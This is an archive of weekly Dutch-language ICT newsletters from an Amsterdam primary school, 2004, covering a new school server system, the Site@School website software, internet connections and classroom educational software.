De CD ging in de server en na wat enters en het intikken van een paar gegevens stond er binnen 20 minuten een complete en werkende server.
Voor de scholen die gebruik maken van het gratis KPN aanbod stonden de IP adressen al voorgeconfigureerd. Handig!
Na één commando draaide het programma 'Janitor' op de client. Dit programma beheert de diverse soorten accounts, groepen en educatieve programma's in een eenvoudige en begrijpelijke interface.
Vervolgens namen we uit ESIS (leerlingvolgsysteem) het EDEXLL.TXT bestand en na nog 10 minuten (even nakijken en aanpassen van dubbele namen) waren er accounts voor 250 leerlingen aangemaakt met de groepen waarin ze thuishoren, inclusief hun werkmappen en hun zelf te beheren backupmappen.
Daarna werd even groep 8 van school gedaan en groep 7 bevorderd naar groep 8, behalve Arie, die is blijven zitten.
Dit alles was in enkele muisklikken gedaan. We waren verbluft en hadden het idee: dit kunnen wij ook; dit is echt simpel.
Vervolgens kregen we te zien hoe eenvoudig telewerken in zijn werk gaat. Het is alsof je in de Windows Verkenner zit en je document op je computer opent, maar je opent het document op de server op school. Je werkt er aan en slaat 't op, op school. En je kan het natuurlijk ook thuis bewaren en bewerken.
Weer waren we aangenaam verrast door de eenvoud en helderheid van het idee van thuiswerken.
Daarna nog even de webmail bekeken. Was ook al klaar en bruikbaar.
Al met al duurde de hele demonstratie ruim een uur.
We waren zeer tevreden.
Lees vooral alle features van dit prachtige systeem op:
http://serveropschool.nl/

In de laatste drie weken van de grote vakantie wordt ServerOpSchool geinstalleerd op drie scholen. Dan pas weten we hoe het echt werkt. We hebben er alle vertrouwen in.

De school gaat nu dicht voor de zomervakantie, hetgeen niet betekent dat wij stilzitten op ICT gebied.

Prettige weken
groeten,
Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

Schooljaar 2004-2005

 1. 2004-08-27 w35
 2. 2004-09-03 w36
 3. 2004-09-11 w37
 4. 2004-09-17 w38
 5. 2004-09-23 w39
 6. 2004-09-30 w40
 7. 2004-10-08 w41
 8. 2004-10-15 w42
 9. 2004-10-29 w44
 10. 2004-11-05 w45
 11. 2004-11-09 w46
 12. 2004-11-19 w47
 13. 2004-11-24 w48
 14. 2004-12-03 w49
 15. 2004-12-10 w50
 16. 2004-12-17 w51
 17. 2004-12-23 w52
 18. 2005-01-14 w02
 19. 2005-01-21 w03
 20. 2005-01-28 w04
 21. 2005-02-04 w05
 22. 2005-02-11 w06
 23. 2005-02-24 w08
 24. 2005-02-25 w08
 25. 2005-03-04 w09
 26. 2005-03-11 w10
 27. 2005-03-18 w11
 28. 2005-03-24 w12
 29. 2005-03-31 w13
 30. 2005-04-08 w14
 31. 2005-04-15 w15
 32. 2005-04-22 w16
 33. 2005-04-29 w17
 34. 2005-05-13 w19
 35. 2005-05-20 w20
 36. 2005-05-27 w21
 37. 2005-06-03 w22
 38. 2005-06-10 w23
 39. 2005-06-17 w24
 40. 2005-06-24 w25
 41. 2005-06-28 w26
 42. 2005-07-08 w27
 43. 2005-07-15 w28
 44. 2005-07-21 w29

2004-08-27 w35

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 35 - 2004 (27 augustus)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Nieuwe server

In de laatste week van de zomervakantie is ons nieuwe serversysteem geïnstalleerd.

Dat houdt in, dat we nu zijn aangesloten bij een organisatie die ons netwerk beheert, ook op afstand. (lees meer hieronder bij “Server op School”). De installatie verliep erg soepel. De aanpassingen in de school zijn nog niet helemaal op orde, waardoor af en toe mensen hun documenten nog niet kunnen vinden. Want tegelijkertijd met de nieuwe server hebben we ook wat gereorganiseerd met de computers. Alle computers die de leerlingen gebruiken zijn identiek, op de computers met het programma Veilig Leren Lezen na.

Wat nog wel een klus is, is het overzetten van de mappen van de leerlingen naar de nieuwe server. Meteen wordt namelijk een hoop troep van de leerlingen opgeruimd.

We zijn heel erg benieuwd hoe het ons zal bevallen en of Dirk nog veel te doen zal hebben bij ons.

ICT coördinatie

Helaas hebben we moeten snoeien in de ICT tijd van de ICT coördinator. Afgesproken is, dat de nadruk dit jaar zal liggen op het consolideren van de ICT leerlijn. Voor technische problemen en ondersteuning in groepen, zal minder tijd zijn. Alle klachten en storingen graag melden in het “computerschrift”.

Naschoolse Activiteiten.

Over twee weken zal de eerste naschoolse ICT-activiteit starten. We zijn erg benieuwd.

Website

De bedoeling was, dat we na de zomervakantie onze website zouden aanpassen aan het nieuwe schoollogo. Dat is nog niet gedaan. Het is meer werk dan gedacht. Dus nog even geduld. Wel heeft onze directeur nu ook de smaak te pakken: hij brengt nu ook veranderingen aan aan de inhoud van de website.

TECHNISCH (S@S en SoS)

SERVER OP SCHOOL

In de vakantie hebben Peter en Dirk keihard gewerkt. SoS draait nu op 4 scholen. Nog niet vlekkeloos, door wat aanloopproblemen (nieuwe ervaringen), maar we komen er uit.
Het werken met 'Janitor', het beheerprogramma van SoS is een waar genoegen. Ook de migratie van leerlingen uit ESIS naar SoS is een eitje. Dat scheelt heel veel werk in het aanmaken van leerlingen. Migratie van oude data kostte meer tijd dan gedacht en ook onverwachte verschillen in 'identieke' computers zorgden voor tijdverlies.

ANDER IP ADRES

Vlak na de migratie van Dirklan naar ServerOpSchool kregen we van chello het bericht dat we een nieuw IP adres zouden krijgen. Daarmee verviel ons bekende adres http://node11ef5.a2000.nl. De migratie van het oude naar het nieuwe adres was een eitje met ServerOpSchool. Daarna hadden we nogal wat werk om alle node11ef5 links uit de website en Forum databases te halen. Toen ook dat achter de rug was, bleken er in vergeten hoekjes nog een paar foute linkjes te liggen. We hopen dat we ze allemaal te pakken hebben.

SITE AT SCHOOL

Fred werkt hard aan versie 2.2 die eind oktober uitkomt. Steeds meer bedrijven gaan S@S aanbieden. Dat levert ze leuk geld op.
We ontvingen van een onbekende gever een donatie t.b.v. S@S. Het geld zal goed besteed worden.
De problemen met de agenda (sessies die verlopen) zijn opgelost en de agenda heeft nu ook een printbaar weekoverzicht van alle afspraken. Veel leden van het team werken nu met de agenda.

groeten en goed weekend,
Karin
Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-09-03 w36

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 36 - 2004 (3 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Als ik deze nieuwsbrief ontvang in de web mail van de Rosa Boekdrukker dan is nergen een blanco regel te zien.Nu verstuur ik hem aan de testers (jullie) en wacht af hoe hij in jullie enail eruit ziet. Hoop dat het te lezen is.groeten, Karin

WEBSITE - Verzoek aan de collega's.

We willen de website wat veranderen, het nieuwe logo moet erin.

We hebben een testversie, met de kleuren van het logo. Wat vinden jullie ervan? Kan het zo? Graag suggesties en opmerkingen, misschien wat betreft de kleuren.  (per mail naar: info@rosaboekdrukker.net). Wel rekening houden met slechtzienden: de letters moeten zwart blijven en de achtergrond waarop de letters staan moeten licht van kleur zijn.

Zie de testsite: http://wyxs.net/index.php?section=1

UITLEG NIEUWE SERVER

Deze week werd een hele middag van alles doorgesproken over het nieuwe netwerk:

Het ziet er allemaal heel simpel uit. En niet erg afwijkend van wat we gewend zijn. Van thuis uit inloggen en de mappen opruimen is heel bijzonder. Wat ook nieuw was, is de “virtual cd”. De cd-rom van Anne Frank draait nu in het netwerk alsof de cd in de cd rom speler zit.

De komende week zullen de groepen hun nieuwe e-mailadres krijgen met het bijbehorende wachtwoord.

ABC - ONDERWIJSBEGELEIDINGSDIENST

Er zijn afspraken gemaakt met Monique van het ABC. Zij begeleidt ons met onze ICT leerlijn. We gaan weer om de tafel zitten om te bekijken wat we voor dit jaar hebben afgesproken. Er moeten data vastgesteld worden voor klassenconsulten en nascholingen en teambijeenkomsten. De groepen moeten hun ICT opdrachten ontvangen.

VERKEERSONDERWIJS

Wij doen mee aan een pilot voor verkeersonderwijs. Het ABC heeft een computerprogramma ontwikkeld in opdracht van de Gemeente Amsterdam waarin de leerlingen de geleerde verkeersregels kunnen toepassen in een situatie hier in de buurt. Het programma heet Tussen School en Thuis en bestaat uit allemaal foto’s met opdrachten en vragen in de buurt van onze eigen school. We hebben nu ook een verkeersmethode in boekvorm.

Er moet een bijeenkomst gepland worden om het programma uit te leggen.

EDUCAT-B

In het programma Educat B zijn de kleuterboeken op een andere computer ingevoerd dan de rest van de boeken. Volgende week gaan die twee bestanden samengevoegd worden in de netwerkversie van het programma. Spannend of het allemaal gaat lukken.

IB

Onze IB-ers hebben een nieuwe werkplek. Deze week zijn ze voorzien van elk een eigen computer. Nu moeten we alleen nog van die LCD beeldschermen voor hen kopen, zodat ze nog werkruimte overhouden.

Dat was het weer.

Een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-09-11 w37

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 3 - week 37 - 2004 (10 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Website

We hebben nog geen commentaar ontvangen op onze testsite voor een nieuwe website <http://wyxs.net/index.php?section=1>http://wyxs.net/index.php?section=1>

Netwerk opstart probleempjes

Er zijn nog dingen niet klaar met ons nieuwe netwerk. Dat ligt aan ondergetekenden en tijdgebrek.
- de oude documenten van de kinderen moeten nog worden overgezet naar de nieuwe mappen
- de bureaubladen van de verschillende groepen moeten nog worden aangepast met de juiste snelkoppelingen
- nog niet alle computers zijn voorzien van een nieuw image, waardoor met name de kleutergroepen het netwerk nog niet op kunnen
- bij de directie moeten de computers nog in towers worden ingebouwd
- er is een nieuwe netwerkversie van LETTERPRET binnen!!!
- de verschillende groepen moeten nog een emailadres krijgen. Dat is er deze week niet van gekomen.

KPN

Binnenkort gaat de aanvraag voor de gratis internetverbinding met de KPN de deur uit. Voor de vakantie wilden we het al doen, maar waren bang, dat de boel dan precies in de vakantie zou worden aangesloten. Ook onze UPC provider komt binnenkort met een aanbod voor scholen. Wat zullen we snel en bereikbaar zijn dan.

Frustratie uiting

Sinds het nieuwe schooljaar zijn er organisatorische veranderingen op ICT gebied op de Rosa Boekdrukker.
Karin heeft nog maar 1 dag per week voor ICT activiteiten i.p.v. 2.
De gevolgen merken we dagelijks. Klussen worden niet afgewerkt door tijdgebrek. Karin heeft geen tijd meer om Dirk aan te sturen. Leerkrachten kunnen niet goed meer met hun problemen bij Karin terecht. De naschoolse ICT activiteiten dreigen ongesuperviseerd te worden uitgevoerd. Er is geen tijd meer voor experimenten m.b.t. de ICT leerlijn.

Bovenstaande voorbeelden laten zien dat onze ICT-ervaringen niet meer geregistreerd en gesystematiseerd worden; kortom, ze gaan verloren. We voelen dat we onze greep op ICT gebied in school kwijtraken en overgeleverd worden aan toevalligheden. Dat is zonde, want daarmee dreigt ook onze positie als innoverende club voor _alle_ basisscholen in gevaar te komen. Vele basisscholen in Nederland putten uit onze ervaringen.
Laten we hopen dat de zaak ten goede kan keren.

groeten en een prettig weekend
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-09-17 w38

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 38 - 2004 (17 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ABC – schoolbegeleidingsdienst

Deze week hebben we data vastgesteld voor een aantal bijeenkomsten. De hoogste drie klassen zullen nog deze maand een startbijeenkomst hebben waarop wordt uitgelegd wat de bedoeling van het programma Digiwijzer precies is. Vorig schooljaar hebben we er mee geëxperimenteerd, maar dit jaar wordt het serieus. Met dit programma leren de leerlingen gericht zoeken op het internet, waardoor ze informatie beter kunnen vinden.

Ook is er een datum vastgesteld waarop de groepen 3 t/m 8 instructies krijgen over het gebruik van het verkeersprogramma “Tussen School en Thuis”

Naschoolse Activiteiten

Afgelopen maandag vond de eerste van vier cursussen ICT na schooltijd plaats. Er deden 8 leerlingen aan mee uit groep 5. Ze moesten aan de gang met de opmaak van tekst. Door een technische storing aan ons netwerk (zie onder) konden de leerlingen niks printen. a.s. maandag zal hun product wel in kleur kunnen worden afgedrukt.

Bureaubladen

Karin had nog moeite met het inrichten van de bureaubladen van de verschillende groepen. Niet omdat het zo moeilijk was, maar omdat ze de te nemen stappen niet goed had opgeschreven. Bij de groepen 3, 4, 5 en 6 zijn de bureaubladen nu bijna in orde. Alleen moet het programma Educat er nog bij.

Educat

Met dit programma zijn de bibliotheekboeken ingevoerd in ons netwerk. De kleuterboeken en de andere boeken zijn nu bij elkaar gevoegd. Dat kan, omdat we nu een netwerkversie van het programma hebben. Op elke computer kan het programma nu gebruikt worden. In de toekomst zullen de kinderen dan in de klas kunnen zien welke boeken er beschikbaar zijn. Ook zal het uitlenen dan via de computer gaan. Nu is het steeds een hopeloze warboel van kaartjes. 

Invoer leerlingen

Bij de meeste programma's zijn de leerlingen nu ingevoerd of verplaatst naar een hogere groep. Bijvoorbeeld bij het programma Tafeltotaal van Ambrasoft zijn de leerlingen van groep 4 nu overgeheveld naar groep 5. En de leerlingen van groep 6 zijn verwijderd, want daar kennen ze de tafels.

Technische storing

Deze week werden er twee nieuwe telefoonlijnen aangelegd. Daarvoor moest het installatiebureau ons netwerk gebruiken. Opeens waren alle computers van één switch niet meer aangesloten. Vreemd! Het installatiebureau wist natuurlijk van niets.... Het was vooral vervelend, omdat het precies de administratie computers waren die het netwerk niet op konden en die het leerlingvolgsysteem niet meer konden aanpassen en de computers waar  de naschoolse ict-cursus op plaats vond.

NL tree

NL tree is weer bezig met een administratieve chaos. We ontvingen een brief waarin ons werd gevraagd op tijd ons contract met hen op te zeggen. Wij hadden dat reeds op 9 september 2003  per aangetekende brief gedaan. Ook kwamen ze van de week het modem en de router ophalen. (toen dat niet lukte zeiden ze: “ach, hou het ook maar”) Vreemde volgordes hanteren ze daar.

ICT bijeenkomst deelraad

Vorige week schreven we in onze nieuwsbrief, dat we tijd te kort kwamen voor onze ICT werkzaamheden. Die noodkreet werd door ons bestuur opgevangen en er werd ook gehoor aan gegeven. Deze week werden wij (de openbare scholen in ons stadsdeel) uitgenodigd voor een bijeenkomst met alle ICT coördinatoren. Eén van de agenda punten was het inventariseren van de formatie-uren voor ICT. Alle scholen klaagden, dat ze niet genoeg tijd hebben om beleid te maken of uit te voeren wat de leerlijnen betreft. Dit probleem zal worden voorgelegd aan het hoofd afdeling onderwijs van ons stadsdeel.

Ook van andere kanten kregen we bijval.

Letterpret

Een nieuwe versie van Letterpret is geïnstalleerd en zoals gewoonlijk kwam de tekst in de handleiding niet overeen met de tekst die tijdens de installatie verscheen. Maar, met wat heen en weer gepruts werkte het programma. Echter wel weer tot onze verbazing kon leerling X op twee computers tegelijk inloggen. Dat hoort natuurlijk niet te mogen! Het blijft brakke software. Tijdens de installatie zijn de ingevoerde gegevens bewaard gebleven. Maandag volgt de echte test. Volgende week de uitslag. 

groeten en een goed weekend,
Dirk en Karin

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-09-23 w39

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 39 - 2004 (24 september)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Letterpret werkt!!!

Het mag wel zo ongeveer in de krant. Na een worsteling van twee jaar is het geheel eindelijk aan de praat gekregen. We ontvingen na de zomervakantie een nieuwe versie zonder beveiligingssleutel. Vorige week waren er nog problemen: er kon op twee computers onder dezelfde naam worden ingelogd. Dat is door onze man van sOs (server Op school) opgelost. Alle kinderen hebben een nieuw ikoontje en alles werkt (tot nu toe) naar wens. Eigenlijk niet te geloven. We zullen nog een bericht naar Malmberg sturen, dat we niet van plan zijn te betalen.

ICT als naschoolse activiteit

Jammer genoeg zoeken wij een nieuwe docent voor dit onderdeel. Voorlopig neemt Karin de taak over.

ICT tijd

Er blijft bijval uit het land komen. Op veel scholen kampt men met gebrek aan tijd voor de onderwijsinhoudelijke kant van ICT binnen de school. Gelukkig heeft ons schoolbestuur een gewillig luisterend oor
Ook in de nieuwsgroep Onderwijs Nieuwe-Media wordt nu een levendige discussie gevoerd over de tijd en de bezigheden van de ICT coördinator.

Digitaal Rijbewijs

Van onze schoolbegeleidingsdienst kwam een oproep om ons in te schrijven voor een aantal workshops voor het inoefenen en/of opfrissen van computervaardigheden voor leerkrachten. De afgelopen jaren hebben we herhaaldelijk aan ons team de mogelijkheid geboden om hun kennis op te frissen, zelfs met een (vrijwillige) cursus op school. Het middel dat het beste werkt is: thuis een computer neerzetten. In ons team heeft iedereen thuis een computer en heeft ook iedereen een emailadres. Volgens ons is dat de beste manier om handigheid in het gebruik te krijgen.
Wij zien niet het nut ervan in om een digitaal rijbewijs te halen. Daarin worden erg veel toepassingen gevraagd die voor de dagelijkse gang van zaken binnen een school niet nodig zijn.
In één van de aangeboden workshops leert met hoe je kinderen gemakkelijk een eigen website kan laten maken. Bij ons op school zit dat gekoppeld aan S@S. Al heel veel kinderen hebben een eigen pagina, of meerdere pagina’s.

Website

www.digijuf.nl
Bij ons op school zijn de kleuters bezig met het thema “emoties”. Veel leuke ideeën zijn te vinden op bovengenoemde website.

Printer aangeboden.

Af te halen een Deskjet 610 C. Prijs: een hartige taart.

Een prettig weekend toegewenst door:
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-09-30 w40

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 40 - 2004 (1 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Interview COS magazine

Deze week werden een van de directeuren van onze school en Karin geïnterviewd door het COS-magazine (computers op school). In oktober komt er een special uit over ELO’s (elektronische leeromgevingen) Wij hebben daar het één en ander over verteld: hoe S@S daar geschikt voor is en tot op welke hoogte wij een ELO in onze school inzetbaar zien.

ICT scholing

Voor de groepen 6, 7 en 8 was er deze week een bijeenkomst met de schoolbegeleidingsdienst (ABC). In de komende periode zal door de groepen het programma DIGIWIJZER gebruikt worden als aanvulling op het taalonderwijs en ter ondersteuning van het gebruik van het internet. In dit programma wordt systematisch aangeleerd hoe je moet zoeken op het internet. De verschillende groepen hebben daar opdrachten voor. De meeste kinderen hebben er vorig jaar al mee gewerkt. Met de ervaring die toen is opgedaan zal nu gestructureerder met het programma worden omgegaan. o.a. is de aandacht gevestigd op het nabespreken van de lessen. Het gaat er niet om dat de kinderen het juiste antwoord geven, maar om het proces om tot een antwoord te komen.

Gebruik Server op School

Het is fantastisch hoe je gemakkelijk je de bureaubladen van de verschillende groepen op maat kunt indelen. Heel handig kun je de ikonen verslepen naar het bureaublad van een groep. Daardoor kan een groep die keurig inlogt met de eigen inlognaam een aangepast bureaublad krijgen van hetzelfde image. Alle groepen hebben namelijk een identieke harde schijf. Alleen zijn niet alle programma’s overal zichtbaar. Het is zelfs mogelijk om op afstand (buiten de school) een bureaublad in te delen.

KPN

Deze week is de aanvraag voor de gratis verbinding met internet de deur uitgegaan. Via internet vul je een aanvraagformulier in, dat dan geprint wordt en per fax of TPG moet worden verstuurd.

PRINTER

We hebben geen enkele reactie gekregen op onze aangeboden kleurenprinter. Waar zou dat aan liggen?

Site@School

Het is al een paar weken stil rond S@S in de BIC. Dat wil niet zeggen dat er niets gebeurt. We hebben alleen geen tijd om het te melden.
Fred legt de laatste hand aan versie 2.2 die eind oktober volgens plan uit moet komen. Er zijn nog kleine veranderingetjes mogelijk, en als daarom gevraagd wordt, doen we die nog in deze versie.
De 14e taal die erbij is gekomen is Deens en Maleisisch komt er aan.
S@S V2.2 krijgt nieuwe ikonen. Barry is bezig met de laatste loodjes.
Er komt een nieuwsbrieven module in die, al zeggen we het zelf, een juweeltje is.
Verder vele grote en kleine verbeteringen. Het manual moet ook aangepast worden aan de nieuwe versie en daar is Dirk mee belast. Ondertussen zijn we al bezig met een nieuwe versie. Daarin zal een chat module zitten waar we nu mee aan het experimenteren zijn. Als je mee wilt doen, meld je dan aan.
We hebben een kleine subsidie gekregen waar we een paar vervelende klussen voor laten doen. (het schrijven van het developers manual en het gebruikersbestendiger maken van de programmeercode)

Server Op School

Ook weinig van gehoord, maar ook daar wordt niet stil gezeten. Peter en Dirk hebben de laatste klusjes op de drie scholen gedaan. Alles loopt nu goed. We hebben subsidie ontvangen voor twee projecten: het schrijven van documentatie en het maken van een programma om images over het netwerk via PXE naar client computers te halen. Daarnaast hebben we een ontwikkelopdrachtje om het GPL virusprogramma Clamav ( http://www.clamav.net , kijk daar eens welke bedrijven het allemaal gebruiken) dat nu de email scanner van SoS is, zo te installeren dat het virussen scant en opruimt op de windows clients. We hoeven hier niet te zeggen dat Norton ons 4 Euro per computer per jaar kost. Tel uit je winst!

groeten en een prettig weekend.
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-10-08 w41

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 41 - 2004 (8 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Prijsuitreiking Linux-programmeer-wedstrijd

Vorige week vond op onze school de prijsuitreiking plaats van de programmeerwedstrijd die was uitgeschreven door het Linux Magazine (http://www.linuxmag.nl/nl/4137085f61440#a4137085fa0a7a )
Onze school heeft wat geld van het ICT budget gehaald om bij te dragen aan de prijzenpot van de wedstrijd.
Sites van de winnaars:
http://www.vliegersenverzamelaars.net/
http://edu.kde.org/kturtle/

foto’s prijsuitreiking: http://www.rosaboekdrukker.net/index.php?page=615&navpath=,472,473,1611&contents=1612,1629,3445&section=15&ID=3445&gallerypage=1

Omdat wij van mening zijn, dat software voor het onderwijs opensource moet zijn en door de gebruikers gemakkelijk moet kunnen worden aangepast aan hun wensen, waren wij graag bereid ons steentje bij te dragen aan de wedstrijd die jaarlijks wordt uitgeschreven door het Linux Magazine.
Kanttekening: het blijkt in de praktijk nog een behoorlijke hobbel om programmeerders en gebruikers bij elkaar te brengen. Voor het maken van educatieve software is natuurlijk een onderwijskundige aanpak en inzicht nodig.
Oproep: het zou leuk zijn als alle scholen ook een kleinigheid bijdragen: dan wordt het een grote prijs!

Sneeuwbal.

We werden deze week gebeld door een school in Amstelveen die via via goede informatie had ontvangen over Site@School. Ze wilden o.a. weten of het te gebruiken is als een ELO, of er een deel van de site afgeschermd kan worden voor het grote publiek. Dat kan!!
Leuk zulke telefoontjes. Het maakt ons nog trotser op ons product.

Trouwens, S@S zal worden vertaald in het grieks, in het antieke alphabeth.

ServerOpSchool

Al sinds dag 1 van het SoS project piekeren Peter en Dirk zich suf hoe ze dit project kunnen vrijgeven ‘aan de wereld’. Een goed project moet je zodanig openbaar maken, dat uiteindelijk alle basisscholen in de wereld  het gratis kunnen krijgen.
Het grote risico dat aan die benadering kleeft is dat, als je het project nu op internet zet om gratis te downloaden, er geen geld is voor toekomstige verbeteringen. (upgrades), als de gebruikers dat zouden wensen.
Onderlaatst, aan de keukentafel in Bussum, hadden we het er weer over en legden het probleem aan een meedenkster voor. Resultaat: na het weekend kwam er een idee voor een financiële continuïteit van het project dat alle andere ideeën naar de prullenbak verwijst!
Voorlopige conclusie: als het idee klopt, krijg je als school geld terug bij meerdere deelnemers.
Wordt vervolgd.

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-10-15 w42

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 42 - 2004 (15 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Jaargang BIC

Misschien hebben oplettende lezertjes gemerkt, dat we met jaargang 4 zijn begonnen. Dat betekent, dat we drie volle jaren elke schoolweek op vrijdagmiddag deze nieuwsbrief hebben doen uitgaan. Alvast dank voor de felicitaties. 

RSI

We werden deze week gebeld door een bedrijf dat aan RSI preventie doet. Voor de volwassenen binnen ons bedrijf worden polssteunen aangeboden ter voorkoming van RSI. Aan de vrouw werd uitgelegd, dat wij doen aan RSI preventie voor kinderen en op zoek zijn naar een juiste stoel. We werden verwezen naar de website, waar prachtige plaatjes staan van volwassenen die zachter een computer zitten. Ja, ze hebben ook speciale voetensteunen. Maar als je de plaatjes bekijkt kan een kind daar nog niet bij. Wat zullen we vertellen, als ze na de herfstvakantie weer eens belt? www.ergonomique.nl

Boodschappen bij PC dokter

Deze week weer lekker met ICT geld gesmeten. Uitgegeven:
- een doos met 30 optische muizen. Bij ons op school willen we geen muizen meer met balletje. Die vervuilen te snel en dat moet je weer schoonmaken, etc
- twee platte LCD monitoren voor de IB ruimte. Het zijn zeer chique schermpjes, bijna zonder rand.
- twee directie-computers in TOWER kasten laten inbouwen, omdat ze dan mooi onder de mooie nieuwe bureaus passen.
Omdat wij een goede klant zijn bij de Pcdokter krijgen we bijna al onze aankopen tegen een gereduceerd tarief. (www.pcdokter.nl)

KPN-modem binnen

Nadat we op 27 september onze aanvraag voor het 3-jarig gratis internet gebruik via de KPN hadden aangevraagd, was er niets meer vernomen. Daarom deze week in de telefoon: een 0900 nummer voor 10 cent per minuut. Eerst word je dan via allerlei doorkies intoetsnummers verder geholpen (tikt lekker aan). Na de vraag of de aanmelding was aangekomen, hoorden we, dat ze nooit een bevestiging sturen: scholen horen niets terug. Maar wat is uw BRIN nummer? En één dag later hadden we de spullen voor de installatie binnen. Toeval?
Na de herfstvakantie gaan we ons bezig houden met de installatie.

KPN en onze kabelaansluiting

Denk na het lezen van het  bovenstaande niet dat we van ons kabel abonnement af willen. We willen ALLEBEI! Dan hebben we een redundante internet verbinding. Dan kunnen we aan load-balancing gaan doen. Dan kunnen we....
Wat kunnen we allemaal met twee Internet aansluitingen?

ESIS upgrade

Inderdaad, na de 1 oktober teldatum hebben we een ESIS upgrade voor Linux proberen te doen. Kort samengevat: Dat viel vies tegen.  Redenen:
- De Linux patches waren van 8 dagen NA de teldatum.
- De documentatie om met Linux te upgraden ontbrak.
- De door de helpdesk voorgestelde wijze van upgraden faalde jammerlijk.
We hebben de upgrade afgebroken en de volledige backup van ESIS teruggezet. Totaal aantal uren voor een mislukte upgrade: 3 uur prutsen.
We beraden ons op actie naar Rovict.  Jullie horen er meer van.

Helaas was de Rovict sores nog niet afgelopen. De volgende dag moesten wij  de diskette van het Amsterdams Monitorbedrijf doen. De door Rovict verstrekte gebruiksaanwijzing klopte niet waardoor Agnes en Ashvin vast kwamen te zitten.  Dirk baalde als een stekker, belde de helpdesk, kreeg het goede antwoord. Er ontbrak een regel in het manual. Hoeveel scholen zouden op dit punt hebben vastgezeten?

Letterpret

In het licht van het bovenstaande. Klagen helpt. Na 1,5 jaar gedonder en druk op Malmberg hebben we nu een werkende netwerk versie.
Klagen helpt.

Site@School

De nieuwe iconen zijn klaar! Dankzij onze grafisch ontwerper Barry ziet de nieuwe versie er schitterend uit. Hulde Barry!!
Speciaal voor de lezers van de BIC: hier is de URL voor een sneak preview:
http://wyxs.net/newicons/starnet/index.php
Login met gebruikersnaam: gast
Je wachtwoord is: gast123
Op 31 oktober zal versie 2.2 beschikbaar zijn met de nieuwe iconen. Zeer bedankt Barry!

We krijgen steeds meer talen binnen. Om jullie geheugen op te frissen zetten we ze maar weer eens achter elkaar, met hulde aan de vertalers.
Engels (doen we zelf), Spaans (Stephen James),Braziliaans-Portugees (DenerBrito), Noors (Henry Jovik), Nederlands (doen wij ook), Zweeds (Daniel Dalethsson ), Duits (Jürgen Goldmann), Chinees (Jinhe Pei), Japans (Ikuko Suzuki), Turks (Ylker Turen), Frans, (Jean Peyratout), Pools (Chris Lojowski),  Fins (Timo Tervo), Deens (Ole Bang Ottosen).
We hebben berichten dat de Italiaanse en Maleisische vertaling onderweg zijn.
We zijn buitengemeen trots dat S@S  zo’n vlucht neemt.

ServerOpSchool

Peter werkt hard aan het image restore systeem. Dirk zag het van de week, was zeer onder de indruk en wel om twee redenen:
1. Het systeem is buitengewoon simpel. Een leerkracht kan in een klas zonder het intikken van wat voor ingewikkelde command's, IP adres, imagenaam. etc. op zeer eenvoude wijze een image van een computer terugzetten.
2. Het systeem is buitengewoon ingewikkeld. De gevoerderde gebruiker kan andere images terugzetten, kan images uploaden, kan bepalen wat het standaard image is voor een werkstation.

Stagiair

We hebben een stagiair: Wilmer.
Hij komt de komende 5 maanden zijn stage bij Peter doorbrengen Wilmer is Debian developer en een zeer bedreven programmeur. We hopen dat we hem nog wat kunnen leren.  We houden jullie op de hoogte.

Tot zover,
Groeten en goed weekend,
Karin, Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2004-10-29 w44

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 4 - week 44 - 2004 (29 oktober)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Artikel in COS

Deze week kwam het COS Magazine uit. Daarin staat een verslag van een bezoek aan onze school. Het nummer gaat over elektronische leeromgevingen (ELO’s). Omdat Site@School daar geschikt voor is werden Agnes en Karin geïnterviewd. Helaas heeft de redacteur -wegens ziekte en daardoor tijdgebrek- onze rectificaties niet meegenomen in de publicatie, waardoor er onjuistheden in het stuk staan. Het ergste is wel , dat de indruk wordt gewekt, dat S@S alleen voor Linux is. We hebben op de schoolsite een rectificatie gezet. (www.rosaboekdrukker.net)
